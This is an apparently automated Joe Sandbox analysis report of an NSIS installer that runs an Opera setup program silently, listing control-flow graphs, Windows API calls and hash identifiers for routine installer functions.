                                                                                                                                                                            control_flow_graph 360 401794-4017b9 call 402dcb call 405fe8 365 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 360->365 366 4017bb-4017c1 call 4066a2 360->366 371 4017da-4017db call 406950 365->371 366->371 375 4017e0-4017e4 371->375 376 4017e6-4017f0 call 4069ff 375->376 377 401817-40181a 375->377 384 401802-401814 376->384 385 4017f2-401800 CompareFileTime 376->385 379 401822-40183e call 406192 377->379 380 40181c-40181d call 40616d 377->380 387 401840-401843 379->387 388 4018b2-4018db call 405727 call 403396 379->388 380->379 384->377 385->384 389 401894-40189e call 405727 387->389 390 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 387->390 400 4018e3-4018ef SetFileTime 388->400 401 4018dd-4018e1 388->401 402 4018a7-4018ad 389->402 390->375 422 401889-40188a 390->422 405 4018f5-401900 CloseHandle 400->405 401->400 401->405 406 402c58 402->406 409 401906-401909 405->409 410 402c4f-402c52 405->410 407 402c5a-402c5e 406->407 412 40190b-40191c call 4066df lstrcatW 409->412 413 40191e-401921 call 4066df 409->413 410->406 419 401926-4023c7 call 405d02 412->419 413->419 419->407 426 402953-40295a 419->426 422->402 424 40188c-40188d 422->424 424->389 426->410
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017D5
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017FA
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                            • API String ID: 1941528284-3663954162
                                                                                                                                                                            • Opcode ID: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                                                            • Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
                                                                                                                                                                            • Opcode Fuzzy Hash: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 427 406a26-406a46 GetSystemDirectoryW 428 406a48 427->428 429 406a4a-406a4c 427->429 428->429 430 406a5d-406a5f 429->430 431 406a4e-406a57 429->431 433 406a60-406a93 wsprintfW LoadLibraryExW 430->433 431->430 432 406a59-406a5b 431->432 432->433
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                            • wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                            • API String ID: 2200240437-1106614640
                                                                                                                                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 434 40349e-4034c6 GetTickCount 435 4035f6-4035fe call 403053 434->435 436 4034cc-4034f7 call 40361d SetFilePointer 434->436 441 403600-403604 435->441 442 4034fc-40350e 436->442 443 403510 442->443 444 403512-403520 call 403607 442->444 443->444 447 403526-403532 444->447 448 4035e8-4035eb 444->448 449 403538-40353e 447->449 448->441 450 403540-403546 449->450 451 403569-403585 call 406c11 449->451 450->451 452 403548-403568 call 403053 450->452 457 4035f1 451->457 458 403587-40358f 451->458 452->451 459 4035f3-4035f4 457->459 460 403591-403599 call 406244 458->460 461 4035b2-4035b8 458->461 459->441 465 40359e-4035a0 460->465 461->457 462 4035ba-4035bc 461->462 462->457 464 4035be-4035d1 462->464 464->442 468 4035d7-4035e6 SetFilePointer 464->468 466 4035a2-4035ae 465->466 467 4035ed-4035ef 465->467 466->449 469 4035b0 466->469 467->459 468->435 469->464
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                                              • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                                                            • SetFilePointer.KERNEL32(00045AA4,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                            • String ID: hA
                                                                                                                                                                            • API String ID: 1092082344-2144240161
                                                                                                                                                                            • Opcode ID: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                                                            • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                                                            • Opcode Fuzzy Hash: e11cf52a2002a60f9caf7e4f5257b2a9e139536fe8b899a245e26a0cd04ca586
                                                                                                                                                                            • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 554 406079-406094 call 4066a2 call 40601c 559 406096-406098 554->559 560 40609a-4060a7 call 406950 554->560 561 4060f2-4060f4 559->561 564 4060b7-4060bb 560->564 565 4060a9-4060af 560->565 567 4060d1-4060da lstrlenW 564->567 565->559 566 4060b1-4060b5 565->566 566->559 566->564 568 4060dc-4060f0 call 405f71 GetFileAttributesW 567->568 569 4060bd-4060c4 call 4069ff 567->569 568->561 574 4060c6-4060c9 569->574 575 4060cb-4060cc call 405fbd 569->575 574->559 574->575 575->567
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 004060D2
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 004060E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: PgE
                                                                                                                                                                            • API String ID: 3248276644-3220684765
                                                                                                                                                                            • Opcode ID: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                                                            • Instruction ID: 4bebfd15c2bd202af51862231bcf25e973859f7a9abf5f27d8efd0e3f4a0fce5
                                                                                                                                                                            • Opcode Fuzzy Hash: b320ac714881839a993191b9b67f373f4f0dd5a8269bf5d6f48fcd2d5b08a690
                                                                                                                                                                            • Instruction Fuzzy Hash: 21F07835084A6259E622B7360C05AAF25098F8232470B423FFC43B22C1DF3D8973D17E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 577 4061c1-4061cd 578 4061ce-406202 GetTickCount GetTempFileNameW 577->578 579 406211-406213 578->579 580 406204-406206 578->580 581 40620b-40620e 579->581 580->578 582 406208 580->582 582->581
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004061DF
                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403663,004CD000,004D1000,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F), ref: 004061FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                            • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                            • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                                                                                                                                            • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 583 4071f5-4071fb 584 407200-40721e 583->584 585 4071fd-4071ff 583->585 586 4074f1-4074fe 584->586 587 40742c-407441 584->587 585->584 588 407528-40752c 586->588 589 407443-407459 587->589 590 40745b-407471 587->590 591 40758c-40759f 588->591 592 40752e-40754f 588->592 593 407474-40747b 589->593 590->593 598 4074a8-4074ae 591->598 596 407551-407566 592->596 597 407568-40757b 592->597 594 4074a2 593->594 595 40747d-407481 593->595 594->598 599 407630-40763a 595->599 600 407487-40749f 595->600 601 40757e-407585 596->601 597->601 603 406c53 598->603 604 40765b 598->604 607 407646-407659 599->607 600->594 605 407525 601->605 606 407587 601->606 608 406c5a-406c5e 603->608 609 406d9a-406dbb 603->609 610 406cff-406d03 603->610 611 406d6f-406d73 603->611 613 40765e-407662 604->613 605->588 619 40750a-407522 606->619 620 40763c 606->620 607->613 608->607 614 406c64-406c71 608->614 609->587 617 406d09-406d22 610->617 618 4075af-4075b9 610->618 615 406d79-406d8d 611->615 616 4075be-4075c8 611->616 614->604 622 406c77-406cbd 614->622 623 406d90-406d98 615->623 616->607 621 406d25-406d29 617->621 618->607 619->605 620->607 621->610 624 406d2b-406d31 621->624 625 406ce5-406ce7 622->625 626 406cbf-406cc3 622->626 623->609 623->611 627 406d33-406d3a 624->627 628 406d5b-406d6d 624->628 631 406cf5-406cfd 625->631 632 406ce9-406cf3 625->632 629 406cc5-406cc8 GlobalFree 626->629 630 406cce-406cdc GlobalAlloc 626->630 633 406d45-406d55 GlobalAlloc 627->633 634 406d3c-406d3f GlobalFree 627->634 628->623 629->630 630->604 635 406ce2 630->635 631->621 632->631 632->632 633->604 633->628 634->633 635->625
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                                                            • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                                                                                                                                            • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                                                                                                                                            • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 636 4073f6-4073fa 637 40741c-407429 636->637 638 4073fc-4074fe 636->638 639 40742c-407441 637->639 648 407528-40752c 638->648 642 407443-407459 639->642 643 40745b-407471 639->643 645 407474-40747b 642->645 643->645 646 4074a2 645->646 647 40747d-407481 645->647 653 4074a8-4074ae 646->653 649 407630-40763a 647->649 650 407487-40749f 647->650 651 40758c-40759f 648->651 652 40752e-40754f 648->652 657 407646-407659 649->657 650->646 651->653 654 407551-407566 652->654 655 407568-40757b 652->655 658 406c53 653->658 659 40765b 653->659 660 40757e-407585 654->660 655->660 661 40765e-407662 657->661 662 406c5a-406c5e 658->662 663 406d9a-406dbb 658->663 664 406cff-406d03 658->664 665 406d6f-406d73 658->665 659->661 666 407525 660->666 667 407587 660->667 662->657 668 406c64-406c71 662->668 663->639 672 406d09-406d22 664->672 673 4075af-4075b9 664->673 669 406d79-406d8d 665->669 670 4075be-4075c8 665->670 666->648 677 40750a-407522 667->677 678 40763c 667->678 668->659 675 406c77-406cbd 668->675 676 406d90-406d98 669->676 670->657 674 406d25-406d29 672->674 673->657 674->664 679 406d2b-406d31 674->679 680 406ce5-406ce7 675->680 681 406cbf-406cc3 675->681 676->663 676->665 677->666 678->657 682 406d33-406d3a 679->682 683 406d5b-406d6d 679->683 686 406cf5-406cfd 680->686 687 406ce9-406cf3 680->687 684 406cc5-406cc8 GlobalFree 681->684 685 406cce-406cdc GlobalAlloc 681->685 688 406d45-406d55 GlobalAlloc 682->688 689 406d3c-406d3f GlobalFree 682->689 683->676 684->685 685->659 690 406ce2 685->690 686->674 687->686 687->687 688->659 688->683 689->688 690->680
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                                                                                                                                            • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                                                                                                                                            • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 691 40710c-407110 692 407116-40711a 691->692 693 4071c7-4071d6 691->693 694 407120-407134 692->694 695 40765b 692->695 696 40742c-407441 693->696 697 4075fa-407604 694->697 698 40713a-407143 694->698 699 40765e-407662 695->699 700 407443-407459 696->700 701 40745b-407471 696->701 704 407646-407659 697->704 702 407145 698->702 703 407148-407178 698->703 705 407474-40747b 700->705 701->705 702->703 703->693 712 406c44-406c4d 703->712 704->699 706 4074a2-4074ae 705->706 707 40747d-407481 705->707 706->712 709 407630-40763a 707->709 710 407487-40749f 707->710 709->704 710->706 712->695 713 406c53 712->713 714 406c5a-406c5e 713->714 715 406d9a-406dbb 713->715 716 406cff-406d03 713->716 717 406d6f-406d73 713->717 714->704 718 406c64-406c71 714->718 715->696 721 406d09-406d22 716->721 722 4075af-4075b9 716->722 719 406d79-406d8d 717->719 720 4075be-4075c8 717->720 718->695 724 406c77-406cbd 718->724 725 406d90-406d98 719->725 720->704 723 406d25-406d29 721->723 722->704 723->716 726 406d2b-406d31 723->726 727 406ce5-406ce7 724->727 728 406cbf-406cc3 724->728 725->715 725->717 729 406d33-406d3a 726->729 730 406d5b-406d6d 726->730 733 406cf5-406cfd 727->733 734 406ce9-406cf3 727->734 731 406cc5-406cc8 GlobalFree 728->731 732 406cce-406cdc GlobalAlloc 728->732 735 406d45-406d55 GlobalAlloc 729->735 736 406d3c-406d3f GlobalFree 729->736 730->725 731->732 732->695 737 406ce2 732->737 733->723 734->733 734->734 735->695 735->730 736->735 737->727
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                                                                                                                                            • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 738 406c11-406c34 739 406c36-406c39 738->739 740 406c3e-406c41 738->740 741 40765e-407662 739->741 742 406c44-406c4d 740->742 743 406c53 742->743 744 40765b 742->744 745 406c5a-406c5e 743->745 746 406d9a-407441 743->746 747 406cff-406d03 743->747 748 406d6f-406d73 743->748 744->741 749 406c64-406c71 745->749 750 407646-407659 745->750 759 407443-407459 746->759 760 40745b-407471 746->760 754 406d09-406d22 747->754 755 4075af-4075b9 747->755 751 406d79-406d8d 748->751 752 4075be-4075c8 748->752 749->744 757 406c77-406cbd 749->757 750->741 758 406d90-406d98 751->758 752->750 756 406d25-406d29 754->756 755->750 756->747 761 406d2b-406d31 756->761 762 406ce5-406ce7 757->762 763 406cbf-406cc3 757->763 758->746 758->748 764 407474-40747b 759->764 760->764 767 406d33-406d3a 761->767 768 406d5b-406d6d 761->768 771 406cf5-406cfd 762->771 772 406ce9-406cf3 762->772 769 406cc5-406cc8 GlobalFree 763->769 770 406cce-406cdc GlobalAlloc 763->770 765 4074a2-4074ae 764->765 766 40747d-407481 764->766 765->742 773 407630-40763a 766->773 774 407487-40749f 766->774 776 406d45-406d55 GlobalAlloc 767->776 777 406d3c-406d3f GlobalFree 767->777 768->758 769->770 770->744 778 406ce2 770->778 771->756 772->771 772->772 773->750 774->765 776->744 776->768 777->776 778->762
                                                                                                                                                                            Memory Dump Source
